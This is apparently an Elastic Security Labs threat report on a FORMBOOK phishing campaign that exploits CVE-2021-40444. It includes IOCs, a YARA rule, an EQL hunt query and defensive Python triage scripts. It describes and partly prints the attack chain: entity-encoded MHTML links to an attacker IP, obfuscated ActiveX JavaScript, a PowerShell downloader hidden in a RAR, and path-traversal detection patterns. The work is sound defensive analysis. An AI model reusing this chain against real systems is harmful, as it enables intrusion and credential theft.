FORMBOOK Adopts CAB-less Approach


The Elastic Intelligence & Analytics team is tracking a new FORMBOOK information-stealing campaign leveraging the MSHTML remote code execution exploit (CVE-2021-40444). This campaign has been observed sharing infrastructure between the Weaponization phases of both the testing and production releases.

We have observed, and will discuss, three phases of this campaign relevant to defenders:

  • Testing phase using CVE-2021-40444
  • Production phase using CVE-2021-40444
  • Generic phase without CVE-2021-40444

As of November 8, 2021, Elastic observed network infrastructure actively being used to deploy the FORMBOOK information stealer and acting as a command and control endpoint serving archives, implants, and scripts leveraged throughout the campaign variations.

We wanted to call out some great adjacent research from the team at SophosLabs Uncut that was released on December 21, 2021. Research groups frequently analyze similar, or in this case, the same campaigns through their own lens. This is fantastic as it gets more eyes, from different perspectives, onto the same problem. If you’re looking for more information, please check out their research over on their blog.

  • The speed at which vulnerability PoCs are being released highlights the need to leverage threat hunting to identify post-exploitation events before patches can be applied
  • A FORMBOOK campaign was observed combining infrastructure that allowed testing and production phases to be linked together
  • Patching for the MSHTML exploit appears to be effective as the campaign shifted from attempting to use the exploit to a traditional phishing malware-attachment approach
  • The campaign required a multi-process attack chain to load a DLL file onto victim systems

On September 7, 2021, Microsoft confirmed a vulnerability for the browser rendering engine used in several applications such as those within the Microsoft Office suite. Within three days [1] [2], proof-of-concept code was released, highlighting the maturity of the exploit development ecosystem and underscoring the importance of proactive threat hunting and patch management strategies.

Based on telemetry, we observed this exploit used in conjunction with the FORMBOOK information stealer. We also identified an adversary tradecraft oversight that led to us connecting what appeared to be campaign testing infrastructure and a FORMBOOK phishing campaign targeting manufacturing victims with global footprints.

This post details the tactics, techniques, and procedures (TTPs) of this campaign. Our goal is to enable detection capabilities for security practitioners using the Elastic Stack and any readers concerned with the CVE-2021-40444 vulnerability or campaigns related to FORMBOOK.

Additionally, this highlights the maturity of the exploit development community — underscoring the importance of proactive measures (like network and endpoint monitoring, anti-spam/phishing countermeasures, email MIME-type attachment policies, etc.) and an exercised patch management strategy.

At a high level, an attacker could craft a malicious ActiveX control to be used by a Microsoft Office document that will allow for code to be remotely executed on a victim machine. While this vulnerability is well documented, security researcher

We initiated several collection techniques simultaneously, including searching for malicious attachments that would be included in phishing emails — one of the most common mechanisms for distributing exploit code. We noticed that not many malicious email attachments had been reported, and by October 28, 2021, we were only able to identify four instances of this exploit leveraged with email. In addition to the four instances of the exploit, we observed the threat actor attempting to leverage a generic phishing approach with the FORMBOOK malware as an attachment.

The following sections will break down these different campaign sightings and their respective details:

  • Testing
  • Production
  • Generic

Throughout the Details section, it is important to note a few things that are required for this attack chain to function, irrespective of the Testing or Production phases:

1. A major challenge for the campaign is to get a DLL file onto the victim system

2. ActiveX controls are DLL files with special constraints

3. Web pages can link ActiveX controls directly or load files that are contained in a URL — this is not recommended by Microsoft because file signatures cannot be validated

The first sighting contained an email with a single attachment and a sender of admin0011[@]. While researching that email address, we discovered it associated with additional malicious samples in VirusTotal. The email observed in this phase included a single attachment called Request Details.docx.

Testing phase lure email

Email attachments are stored as Base64 encoded strings in the email. To extract the Request Details.docx email attachment, we can use the echo command to send the Base64 encoded string to STDOUT, pipe it to the base64 program, and save it as email-attachment so that we can analyze it.

$ echo "UEsDBBQAAAAIAFCELVO0gTweZgEAAIgFAAATAAAAW0NvbnRlbnRfVHlwZXNdLnhtbLVUyWrDMBC9F/oPRtdgK+...truncated..." | base64 -D -o email-attachment

$ file email-attachment
email-attachment: Microsoft Word 2007+

$ unzip email-attachment
Archive:  email-attachment
  inflating: [Content_Types].xml
  inflating: docProps/app.xml
  inflating: docProps/core.xml
  inflating: word/document.xml
  inflating: word/fontTable.xml
  inflating: word/settings.xml
  inflating: word/styles.xml
  inflating: word/webSettings.xml
  inflating: word/media/image1.jpeg
  inflating: word/media/image2.wmf
  inflating: word/theme/theme1.xml
  inflating: word/_rels/document.xml.rels
  inflating: _rels/.rels

Within the document relationship file (word/_rels/document.xml.rels), we can view metadata about how different elements of the document are related to each other.

$ cat word/_rels/document.xml.rels
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
...truncated...
<Relationship Id="rId6" Type="" Target="MHTML:&#x48;&#x54;&#x54;&#x50;&#x3a;&#x5c;&#x5c;&#x31;&#x30;&#x34;&#x2e;&#x32;&#x34;&#x34;&#x2e;&#x37;&#x38;&#x2e;&#x31;&#x37;&#x37;&#x5c;&#x50;&#x6f;&#x70;&#x65;&#x2e;&#x74;&#x78;&#x74;&#x21" TargetMode="External"/>
...truncated...
</Relationships>

From here, we can see an externally linked MHTML OLE object inside an element using HTML entities, which reserve characters in HTML. HTML entities are natively not human readable, so they need to be decoded. Using the data analyzer and decoder from the United Kingdom’s Government Communications Headquarters (GCHQ), CyberChef, we were able to quickly decode the HTML entities with the “From HTML Entity” recipe (CyberChef recipes are pre-configured data parsers and decoders).


The decoded HTML entity was HTTP:\\104[.]244[.]78[.]177\Pope.txt. This provided us with another atomic indicator to add to the admin0011[@] email address we’d previously collected, 104[.]244[.]78[.]177. Additionally, the decoded HTML entity revealed another file that could be of interest, Pope.txt.
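The extraction and decoding steps above, written as one triage script. This is an added example, not Elastic's tooling: it pulls the Base64 attachment out of an e-mail, opens the docx as a ZIP, reads word/_rels/document.xml.rels, and flags any external relationship whose target points at a remote or MHTML location. The e-mail, the docx and the 203.0.113.10 host are constructed samples; the XML parser resolves the &#x..; entities for you, which is the step done with CyberChef in the post.

```python
import html
import io
import zipfile
import xml.etree.ElementTree as ET
from email import message_from_bytes
from email.message import EmailMessage

RELS_PATH = "word/_rels/document.xml.rels"
PKG_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
# Target prefixes that make the document reach off-disk; "mhtml:" is the one seen in this campaign.
REMOTE_PREFIXES = ("mhtml:", "http:", "https:", "ftp:", "file:", "\\\\")


def docx_attachments(eml_bytes):
    """Yield (filename, bytes) for attachments that carry a ZIP/OOXML ('PK') header."""
    msg = message_from_bytes(eml_bytes)
    for part in msg.walk():
        name = part.get_filename()
        if not name:
            continue
        data = part.get_payload(decode=True) or b""  # undoes the Base64 transfer encoding
        if data[:2] == b"PK":
            yield name, data


def external_targets(docx_bytes):
    """Return [(rId, target)] for every TargetMode="External" relationship in the docx."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        if RELS_PATH not in z.namelist():
            return []
        root = ET.fromstring(z.read(RELS_PATH))
    found = []
    for rel in root.iter(f"{{{PKG_NS}}}Relationship"):
        if rel.get("TargetMode", "").lower() != "external":
            continue
        # The XML parser already resolves &#x..; character references in attribute values;
        # unescape once more in case the target was double-encoded.
        found.append((rel.get("Id"), html.unescape(rel.get("Target", ""))))
    return found


def scan_docx(docx_bytes):
    """Flag external relationships whose target is a remote or MHTML location."""
    report = []
    for rid, target in external_targets(docx_bytes):
        remote = target.lower().startswith(REMOTE_PREFIXES)
        report.append({"id": rid, "target": target, "verdict": "remote" if remote else "other"})
    return report


def build_sample_docx():
    """Constructed sample: a minimal docx whose rels mimic the entity-encoded MHTML target."""
    tail = "HTTP:\\\\203.0.113.10\\Pope.txt!"  # constructed host from the documentation range
    encoded = "".join(f"&#x{ord(c):x};" for c in tail)  # same HTML-entity trick as the lure
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{PKG_NS}">'
        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.jpeg"/>'
        f'<Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="MHTML:{encoded}" TargetMode="External"/>'
        "</Relationships>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml", '<?xml version="1.0"?><document/>')
        z.writestr(RELS_PATH, rels)
    return buf.getvalue()


def build_sample_eml(docx_bytes):
    """Constructed sample e-mail carrying the docx as a Base64-encoded attachment."""
    msg = EmailMessage()
    msg["From"] = "sender@example.invalid"  # constructed
    msg["Subject"] = "Request Details"
    msg.set_content("Please see the attached request.")
    msg.add_attachment(docx_bytes, maintype="application",
                       subtype="vnd.openxmlformats-officedocument.wordprocessingml.document",
                       filename="Request Details.docx")
    return msg.as_bytes()


if __name__ == "__main__":
    for name, data in docx_attachments(build_sample_eml(build_sample_docx())):
        print(name, scan_docx(data))
```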

Decoded HTML entity from the email attachment

We retrieved a copy of Pope.txt from 104[.]244[.]78[.]177 and observed that it contained JavaScript code using variable renaming and string obfuscation. This JavaScript performs the following functions:

  • Downloads a Cabinet archive file called from the same IP address but fails to extract it
  • Creates several ActiveX objects (which are executable applications or libraries) to be loaded into the browser rendering engine
  • Uses the CVE-2021-40444 vulnerability with the ActiveX objects to perform directory traversal and execute a file called IEcache.inf. This filename is the DLL loader from the ASL IT Security PoC code and doesn’t exist in this test run

Obfuscated JavaScript file

The above figure shows the notable section of the obfuscated JavaScript code. We used a debugger to parse out the results of the lookup functions (shown commented out with //‘s). This revealed the classid (CLSID:edbc374c-5730-432a-b5b8-de94f0b57217) attribute which appears across the web in various other malware analyses of CVE-2021-40444. This suggests with moderate confidence that this JavaScript was crafted using some repurposed code that has been open-sourced. The classid attribute is used to determine if has already been downloaded — if it has, it won’t attempt to download it again.

Once is downloaded and extracted, the extracted file must be located. This is why there are multiple directory execution attempts observed in JavaScript. All the work up to this point is to get the DLL (IEcache.inf) onto the filesystem. Finally, the DLL file would be executed as a control panel file (.cpl), because control panel files can be loaded as DLLs.

Elastic Analyzer showing attempts to execute IECache.inf

In our sample, does not include the ASL IT Security PoC DLL (IEcache.inf). It included a file called 1.doc.inf.

From we used the file archive utility, 7-Zip, to extract 1.doc.inf. This file is interesting because it has the .inf (setup information file) extension, but in using the file command, we can see that it is actually a DLL file, meaning that the file type is being obfuscated.

$ 7z e

7-Zip [64] 17.04 : Copyright (c) 1999-2021 Igor Pavlov : 2017-08-28
p7zip Version 17.04 (locale=utf8,Utf16=on,HugeFiles=on,64 bits,16 CPUs x64)

Scanning the drive for archives:
1 file, 6060053 bytes (5919 KiB)

Extracting archive:
--
Path =
Type = Cab
Physical Size = 6060053
Method = None
Blocks = 1
Volumes = 1
Volume Index = 0
ID = 1234

Everything is Ok

Size:       4465152
Compressed: 6060053

$ file 1.doc.inf
1.doc.inf: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows

=== IMPORTS ===

MODULE_NAME   HINT  ORD  FUNCTION_NAME
bcrypt.dll    0          BCryptSetProperty
              0          GetKeyState
ADVAPI32.dll  0          RegDeleteKeyW
SHELL32.dll   0          ShellExecuteExA
urlmon.dll    0          URLDownloadToFileW
WS2_32.dll 9
ole32.dll     0          CoInitializeSecurity
NETAPI32.dll  0          NetLocalGroupAddMembers
OLEAUT32.dll 8
PSAPI.DLL     0          GetModuleFileNameExW
              0          WTSSendMessageW
              0          GetProcessWindowStation
              0          LocalAlloc
              0          GetModuleFileNameW
              0          GetProcessAffinityMask
              0          SetProcessAffinityMask
              0          SetThreadAffinityMask
              0          Sleep
              0          ExitProcess
              0          FreeLibrary
              0          LoadLibraryA
              0          GetModuleHandleA
              0          GetProcAddress
              0          GetProcessWindowStation
              0          GetUserObjectInformationW

$ pedump --sections 1.doc.inf | awk '{print $1, $2, $3, $4}'
=== SECTIONS ===
NAME   RVA    VSZ    RAW_SZ
.text  1000   12ecd  0
.rdata 14000  49ce   0
.data  19000  1350d8 0
.vmp1  14f000 2c70   0
.vmp0  152000 fac    0
.bss   153000 1000   0
.vmp2  154000 38c0bb 0
.vmp3  4e1000 5c6720 5c6800
.reloc aa8000 5b4    600

As we were unable to analyze the VMProtected file, we continued to explore other information that we’d previously collected. Specifically, we searched for additional samples that had been sent using the same admin0011[@] email address. These parallel analyses identified additional samples and campaign phases, which we’re referring to as the Production and Generic phases.

Production phase lure email

$ file Profile.rar
Profile.rar: data

The attachment has a RAR file extension, but instead of having a file type of RAR archive data, v5, it is raw data. Analysts who discover a file containing raw data can use the less command to dump the file contents to STDOUT to directly inspect what may be inside.


The raw data includes a script job element that can be natively interpreted by the Windows Script Host (WSH). The job element directs WSH to spawn a shell that spawns a hidden PowerShell process which then runs a Base64 encoded PowerShell script. However, the script job element needs to be executed, which isn’t done by double-clicking on the file.


Decoding this string, we can see that a file called abb01.exe is downloaded and executed from 104[.]244[.]78[.]177. This is the same IP address we have observed across all Testing and Production phases.


We’ll continue to explore this file to identify how the script job is executed. As we displayed above, the file still has the Rar! header, so we can decompress this archive. First, we’ll use the unrar program with the e switch to decompress the RAR archive and retrieve the contents: document.docx.

$ unrar e Profile.rar
Extracting from Profile.rar
Extracting  document.docx    OK
All OK

While Profile.rar appears to be a compressed archive, the PowerShell script won’t download and execute abb01.exe automatically upon decompressing it. To execute that script, the compressed document within Profile.rar, document.docx, must be opened.
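A check for the Profile.rar pattern described above, as an added example that is not part of the original post: it locates the RAR signature, treats anything in front of it as foreign content, looks for the WSH job markers there, and decodes a PowerShell -EncodedCommand argument (Base64 of UTF-16LE text). The sample archive and its embedded job are constructed; the PowerShell inside is a harmless Write-Output stand-in for the downloader.

```python
import base64
import re

RAR5_SIG = b"Rar!\x1a\x07\x01\x00"
RAR4_SIG = b"Rar!\x1a\x07\x00"
# PowerShell's -EncodedCommand switch and its Base64 argument (longest alias first).
ENCODED_CMD = re.compile(rb"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def rar_signature_offset(data):
    """Offset of the RAR4/RAR5 signature, or -1 if absent. Bytes before it are foreign."""
    hits = [i for i in (data.find(RAR5_SIG), data.find(RAR4_SIG)) if i >= 0]
    return min(hits) if hits else -1


def decode_encoded_powershell(blob):
    """Decode the first -EncodedCommand argument (Base64 of UTF-16LE) found in blob."""
    m = ENCODED_CMD.search(blob)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_rar(data):
    """Report whether a RAR carries prepended content and, if so, what it contains."""
    off = rar_signature_offset(data)
    result = {"rar_offset": off, "prepended_bytes": max(off, 0),
              "wsh_job": False, "powershell": None}
    if off > 0:
        head = data[:off]
        # A WSH job needs a <job> wrapper and a <script> element; both sit before the archive.
        result["wsh_job"] = b"<job" in head.lower() and b"<script" in head.lower()
        result["powershell"] = decode_encoded_powershell(head)
    return result


def build_sample():
    """Constructed stand-in for Profile.rar: a WSF job ahead of a minimal RAR5 header."""
    ps = "Write-Output 'constructed stand-in for the abb01.exe downloader'"
    encoded = base64.b64encode(ps.encode("utf-16-le")).decode()
    job = ('<job id="x"><script language="JScript">'
           "// constructed launcher placeholder, not the campaign's script\n"
           f'var cmd = "powershell -w hidden -EncodedCommand {encoded}";'
           "</script></job>\r\n").encode()
    archive = RAR5_SIG + b"\x00" * 16  # constructed; not a valid archive body
    return job + archive


if __name__ == "__main__":
    print(triage_rar(build_sample()))
```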

Using the same technique as we highlighted in the Testing phase, we decompressed document.docx and examined the document relationship file (word/_rels/document.xml.rels). As previously described, we observed a remote OLE object stored and formatted as an HTML entity code block that we can decode using CyberChef.

Decoded document.docx HTML entities

We see the same IP address, 104[.]244[.]78[.]177 and a new filename called Profile.html.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "">
<html xmlns="" lang="en" xml:lang="en"><head>
<meta content="text/html; charset=UTF-8" http-equiv="Content-Type" />
<!--
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
This file is generated from xml source: DO NOT EDIT
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
-->
<title>Getting Started - Apache HTTP Server Version 2.5</title>
...truncated…
<script>function a(){var l=['wexcKvyUWOi','ntu3ndaWmeHNC0HOsq','nfPrsujOwG','amohWRqfW5xcNSk/r23cO8kClG',' iSkfW5hcTSk4jmk4xmk2W73dSCkjWOq','ndCXnZeXDLf1tKLj','WRSYCcCZzmkmaW','WQzEqb5xWOldVWXBgSkSWRyp','AhrTBgzPBgu',
'W5tdO1L3WOFdISk8W50','u2nYAxb0','lNDZzJOUlI8UlI8UlI9ezxnRDg9Wl1bYB2zPBguUCMfYpY53C2y','iCkEW592W77cNa',
'WReLW5ddJGiJWRhcRMuYW40LW4v9xSkJWRNcObFdLSkEW5hcMe1kW4JcHL84W7WgWPtcNt4eW4NcP8oZy8kN',
'lNDZzJOUlI8UlI9eB3DUBg9HzhmVuhjVzMLSzs5Yyxi/lNDZzG','ndaWmtu5BvbZqxHH','Bg9JyxrPB24',
'ex3cTSkNW5z+w2RcKGhdLs/dNbBdImoknSk1FwVdQL/cVSkWWRC9WPldO3/dRLv5lt5lW4XFWRVcGWxcNsiX','nZa3mZKWnNP1zffirq',
'bxy1yvlcHujyqSkly2ldHvDrW5vJW7HQW5mZimkKWPJcQJClD0j3WO5SW6KTqmozaWOzACoc','mtKXmZq5mLbREgPOqW','W73dMrjjW53cQaBcVq',
...truncated…
ActiveXObject(j(0x144))[k(0x13c,'k0X5')][j(0x14c)]=k(0x14d,'[Otp'),new ActiveXObject('htmlfile')[j(0x146)]['location']=j(0x14a),new ActiveXObject('htmlfile')[k(0x148, 'MCjf')][k(0x138,'kZYE')]=j(0x147),new ActiveXObject(j(0x144))[j(0x146)][k(0x142,'Lz1J')]=k(0x14f,'BiKg'),new ActiveXObject(k(0x145,'h]@1'))[j(0x146)][j(0x14c)]=k(0x13a,'!v$V'));</script>

Deobfuscating the JavaScript using the same debugger as before, we can see several ActiveXObjects. This time, however, there are far fewer and the execution is more deliberate, eliminating useless calls. This shows a refinement from before. This newer code also uses a .wsf extension instead of the previous .cpl, which allows the exploit to use the Windows Script Host to execute code. This is the same directory traversal technique we observed in the Testing phase. However, this time the JavaScript is looking for the Profile.rar file (whereas in the Testing phase, it was looking for IECache.inf) and attempting to execute the PowerShell script, which was prepended to Profile.rar as a Windows Script File (.wsf).

Deobfuscated JavaScript showing directory search for the original RAR file

As we illustrated above, Profile.rar has a prepended Base64 encoded PowerShell command which downloads abb01.exe. The JavaScript from Profile.html attempts to execute this PowerShell code within Profile.rar as a Windows Script File.

abb01.exe is a dropper that when dynamically executed, drops another PE file, yxojzzvhi0.exe in our example.

yxojzzvhi0.exe was scanned with Elastic YARA rules and identified to be a variant of FORMBOOK, based on unique byte sequences.

FORMBOOK, also known as XLOADER, is an information stealer that includes keyloggers, clipboard copiers, and form grabber components to collect and exfiltrate sensitive information. This malware has been offered as-a-service for over five years and remains a successful tool for stealing information.

Generic phase lure email

These sightings all have two RAR attachments. One of the attachments has a .rar file extension and the other has either a .gz or .7z extension. We’ll explore one of the sightings below.

$ file D2110-095.gz DWG.rar
D2110-095.gz: RAR archive data, v5
DWG.rar:      RAR archive data, v5

$ omnihash DWG.exe D2110-095.exe
Hashing file DWG.exe
  MD5:    ff882802d113ed02fa070c496f89d797
  SHA1:   aad1eed1c53f1d33ab52e13442b036bfeee91f1b
  SHA256: 4216ff4fa7533209a6e50c6f05c5216b8afb456e6a3ab6b65ed9fcbdbd275096
Hashing file D2110-095.exe
  MD5:    ff882802d113ed02fa070c496f89d797
  SHA1:   aad1eed1c53f1d33ab52e13442b036bfeee91f1b
  SHA256: 4216ff4fa7533209a6e50c6f05c5216b8afb456e6a3ab6b65ed9fcbdbd275096

Campaign artifact associations

Throughout all sightings, the campaign used similar sending email addresses:

  • admin0011[@]
  • admin010[@]
  • admin012[@]

Additionally, across the Production and Generic phases of the campaign, we observed the X-Mailer element (the software identifier set by the sending email client) as RainLoop/1.16.0. RainLoop is an open-source email client. It should be noted that in our collection, one sighting had some header information sanitized before being uploaded to VirusTotal. RainLoop could have been referenced in this sighting, but we were not able to confirm that.

As research progressed, we observed activities we believed were capability testing. This activity was observed one time and used artifacts (IEcache.inf, document.xml.rels) from a public CVE-2021-40444 exploit proof-of-concept repository. Other phases included custom exploit code that differed from the PoC code but shared initial access and execution TTPs as well as the same network infrastructure.

We observed that the issratech[.]com, backsjoy[.]com, and leoeni[.]com domains have TLS certificates issued by Let’s Encrypt. While the steps of creating a TLS certificate are not overly cumbersome, the fact that the domain owner went through the preparatory process of creating a certificate could indicate that these domains are intended to be used for future encrypted operations.

In the Generic phase, the campaign abandoned the MSHTML exploit and attempted to leverage a traditional phishing malware-attachment approach. This shift in tactics is possibly because successful exploit patching rendered the vulnerability ineffective.

We observed that of the four companies targeted by this campaign, all were in the manufacturing vertical. Threat actors utilizing FORMBOOK have been observed targeting the manufacturing vertical in the past. The companies all had international footprints in:

  • Industrial Materials, Aluminum extrusion, HQ in Germany (Testing phase)
  • Industrial Conglomerate, Industrial Chemicals, HQ in South Korea (Production phase)
  • Industrial Manufacturing Products and Consulting, HQ in Switzerland (Generic phase)
  • Industrial Mechanical Engineering and Manufacturing, HQ in Germany (Generic phase)

While the targeted companies are of note (in that they are in the same vertical), an email address domain observed in all three phases — issratech[.]com, appears similar to a legitimate Jamaican company domain, isratech[.]com (notice the difference between one and two s’s), a business that specializes in irrigation, wastewater management, and solar energy. Below is a screenshot of issratech[.]com showing the default CyberPanel landing page. CyberPanel is a web hosting control panel for WordPress sites.

Issratech landing page

Each company targeted from the admin0011[@] email address has expertise or products that could be valuable to an Isratech project listed on its projects page (https://www.isratech[.]com/projects/):

  • Chemical: Waste-water treatment, dairy production sanitation
  • Extruded aluminum: Solar array scaffolding, greenhouses

Two additional email address domains were observed in the Generic phase — one appears to be mimicking a legitimate medical equipment manufacturer (backjoy[.]com) and the other (leonei[.]com) appears to be adversary controlled, but seemingly not being used for legitimate purposes.

Techniques and Sub techniques represent how an adversary achieves a tactical goal by performing an action.

Observed techniques/sub techniques

  • Acquire infrastructure – server
  • Obtain capabilities – malware and exploits
  • Stage capabilities – upload malware
  • Phishing – attachment
  • Command and scripting interpreter – PowerShell
  • Exploitation for client execution

These queries can be used in Kibana’s Security → Timelines → New Timeline → Correlation query editor. While these queries will identify this intrusion set, they can also identify other events of note that, once investigated, could lead to other malicious activities.

This query will identify the CVE-2021-40444 exploit attempt from a malicious Access, Publisher, PowerPoint, or Word document.

process where event.type in ("start", "process_started") and
 : ("eqnedt32.exe", "excel.exe", "fltldr.exe", "msaccess.exe", "mspub.exe", "powerpnt.exe", "winword.exe") and
 process.command_line : ("*../../..*", "*..\\..\\*", "*cpl:..*", "*hta:..*", "*js:..*", "*jse:..*", "*sct:..*", "*vbs:..*", "*wsf:..*")

Hunt query identifies CVE-2021-40444 exploit using Timelines
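The hunt logic above expressed in Python and run over constructed ECS-style process events, as an added example that is not Elastic's code. Assumption (not stated in the post): the Office application is matched as the parent of the process whose command line carries the traversal or script-protocol pattern, since the control panel file and Windows Script File loads described above run in a child process. EQL's ':' operator is a case-insensitive wildcard match, emulated here with fnmatch on lower-cased strings.

```python
import fnmatch

OFFICE_APPS = {"eqnedt32.exe", "excel.exe", "fltldr.exe", "msaccess.exe",
               "mspub.exe", "powerpnt.exe", "winword.exe"}
CMDLINE_PATTERNS = ["*../../..*", "*..\\..\\*", "*cpl:..*", "*hta:..*", "*js:..*",
                    "*jse:..*", "*sct:..*", "*vbs:..*", "*wsf:..*"]
START_TYPES = {"start", "process_started"}


def matches(event):
    """True when the event satisfies all three clauses of the hunt query."""
    etype = event.get("event", {}).get("type", [])
    etype = etype if isinstance(etype, list) else [etype]  # ECS event.type is an array
    if not START_TYPES.intersection(etype):
        return False
    proc = event.get("process", {})
    # Assumption: the Office application is the parent of the process being inspected.
    parent = proc.get("parent", {}).get("name", "").lower()
    if parent not in OFFICE_APPS:
        return False
    cmd = proc.get("command_line", "").lower()
    return any(fnmatch.fnmatchcase(cmd, p.lower()) for p in CMDLINE_PATTERNS)


def hunt(events):
    """Return the ids of matching events, in input order."""
    return [e["id"] for e in events if matches(e)]


# Constructed sample events in an ECS-like shape (not real telemetry).
SAMPLE_EVENTS = [
    {"id": 1, "event": {"type": ["start"]},            # Office -> control.exe with cpl traversal
     "process": {"name": "control.exe", "parent": {"name": "WINWORD.EXE"},
                 "command_line": '"C:\\Windows\\System32\\control.exe" ".cpl:../../../Temp/Low/IEcache.inf"'}},
    {"id": 2, "event": {"type": ["start"]},            # Office -> control.exe, benign applet
     "process": {"name": "control.exe", "parent": {"name": "WINWORD.EXE"},
                 "command_line": '"C:\\Windows\\System32\\control.exe" /name Microsoft.Mouse'}},
    {"id": 3, "event": {"type": ["start"]},            # same command line, non-Office parent
     "process": {"name": "control.exe", "parent": {"name": "explorer.exe"},
                 "command_line": '"C:\\Windows\\System32\\control.exe" ".cpl:../../../Temp/Low/IEcache.inf"'}},
    {"id": 4, "event": {"type": ["end"]},              # process end, not a start event
     "process": {"name": "wscript.exe", "parent": {"name": "WINWORD.EXE"},
                 "command_line": 'wscript.exe "wsf:../../../Temp/Low/Profile.rar"'}},
    {"id": 5, "event": {"type": ["start"]},            # Office -> wscript.exe with wsf traversal
     "process": {"name": "wscript.exe", "parent": {"name": "WINWORD.EXE"},
                 "command_line": 'wscript.exe "wsf:../../../Temp/Low/Profile.rar"'}},
]

if __name__ == "__main__":
    print("matching event ids:", hunt(SAMPLE_EVENTS))
```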

rule Windows_Trojan_FORMBOOK
{
    meta:
        author = "Elastic Security"
        creation_date = "2021-06-14"
        last_modified = "2021-08-23"
        os = "Windows"
        arch = "x86"
        category_type = "Trojan"
        family = "FORMBOOK"
        threat_name = "Windows.Trojan.FORMBOOK"
        reference_sample = "6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a"
    strings:
        $a1 = { 3C 30 50 4F 53 54 74 09 40 }
        $a2 = { 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 }
        $a3 = { 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 }
        $a4 = { 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 }
    condition:
        any of them
}

The following steps can be leveraged to improve a network’s protective posture:

  1. Review and implement the above detection logic within your environment using technology such as Sysmon and the Elastic Endpoint or Winlogbeat
  2. Review and ensure that you have deployed the latest Microsoft Security Updates
  3. Maintain backups of your critical systems to aid in quick recovery

The following research was referenced throughout the document:

Indicator | Type | Reference from blog | Note
70defbb4b846868ba5c74a526405f2271ab71de01b24fbe2d6db2c7035f8a7df | SHA256 | Request Document.docx | Testing phase email attachment
7c98db2063c96082021708472e1afb81f3e54fe6a4a8b8516e22b3746e65433b | SHA256 | comres.cab | Testing phase CAB archive
363837d5c41ea6b2ff6f6184d817c704e0dc5749e45968a3bc4e45ad5cf028d7 | SHA256 | 1.doc.inf | Testing phase VMProtect DLL
22cffbcad42363841d01cc7fef290511c0531aa2b4c9ca33656cc4aef315e723 | SHA256 | IEcache.inf | Testing phase DLL loader
e2ab6aab7e79a2b46232af87fcf3393a4fd8c4c5a207f06fd63846a75e190992 | SHA256 | Pope.txt | Testing phase JavaScript
170eaccdac3c2d6e1777c38d61742ad531d6adbef3b8b031ebbbd6bc89b9add6 | SHA256 | Profile.rar | Production phase email attachment
d346b50bf9df7db09363b9227874b8a3c4aafd6648d813e2c59c36b9b4c3fa72 | SHA256 | document.docx | Production phase compressed document
776df245d497af81c0e57fb7ef763c8b08a623ea044da9d79aa3b381192f70e2 | SHA256 | abb01.exe | Production phase dropper
95e03836d604737f092d5534e68216f7c3ef82f529b5980e3145266d42392a82 | SHA256 | Profile.html | Production phase JavaScript
bd1c1900ac1a6c7a9f52034618fed74b93acbc33332890e7d738a1d90cbc2126 | SHA256 | yxojzzvhi0.exe | FORMBOOK malware
0c560d0a7f18b46f9d750e24667721ee123ddd8379246dde968270df1f823881 | SHA256 | DWG.rar | Generic phase email attachment
5a1ef64e27a8a77b13229b684c09b45a521fd6d4a16fdb843044945f12bb20e1 | SHA256 | D2110-095.gz | Generic phase email attachment
4216ff4fa7533209a6e50c6f05c5216b8afb456e6a3ab6b65ed9fcbdbd275096 | SHA256 | D2110-095.exe, DWG.exe | FORMBOOK malware
admin0011[@]issratech.com | email-addr | | Phishing sending email address
admin010[@]backsjoy.com | email-addr | | Phishing sending email address
admin012[@]leoeni.com | email-addr | | Phishing sending email address
issratech[.]com | domain-name | | Adversary controlled domain
backsjoy[.]com | domain-name | | Adversary controlled domain
leonei[.]com | domain-name | | Adversary controlled domain
2[.]56[.]59[.]105 | ipv4-addr | | IP address of issratech[.]com
212[.]192[.]241[.]173 | ipv4-addr | | IP address of backsjoy[.]com
52[.]128[.]23[.]153 | ipv4-addr | | IP address of leonei[.]com
104[.]244[.]78[.]177 | ipv4-addr | | Adversary controlled IP address

Artifacts are also available for download in both ECS and STIX format in a combined zip bundle.
